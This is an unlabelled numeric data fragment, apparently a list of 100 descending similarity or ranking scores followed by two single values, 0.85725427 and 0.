[ "0.6975738", "0.58652604", "0.5590961", "0.5589027", "0.5560638", "0.54133326", "0.5370507", "0.5327911", "0.53260064", "0.531939", "0.5312625", "0.5310126", "0.53042454", "0.5289221", "0.5241468", "0.52322096", "0.52140266", "0.52014375", "0.5191292", "0.5150803", "0.51305264", "0.5123919", "0.5119834", "0.51063", "0.5097295", "0.50875825", "0.50853026", "0.50834537", "0.5066761", "0.50651246", "0.5052988", "0.4989516", "0.4979448", "0.49436846", "0.49166462", "0.48784208", "0.4856261", "0.48411462", "0.48383394", "0.48110372", "0.48094043", "0.4809188", "0.4767653", "0.47670183", "0.47564796", "0.47358906", "0.4726078", "0.47237274", "0.47209874", "0.47188976", "0.47148538", "0.47136626", "0.47136626", "0.46985254", "0.46972826", "0.4682923", "0.46787944", "0.46765363", "0.46722764", "0.46698332", "0.4658553", "0.46578023", "0.46461886", "0.464186", "0.4632603", "0.46307003", "0.4620698", "0.46095398", "0.46054047", "0.46024978", "0.45895994", "0.4569542", "0.45691633", "0.4566361", "0.45557067", "0.45417082", "0.45272508", "0.45240963", "0.45240963", "0.4514674", "0.4513713", "0.4511813", "0.4507946", "0.45079008", "0.4507576", "0.45075685", "0.45044178", "0.45019335", "0.44924277", "0.44876587", "0.4483287", "0.44731838", "0.44639963", "0.44604117", "0.4459118", "0.44571632", "0.44445655", "0.44370356", "0.4427394", "0.44256738" ]
0.85725427
0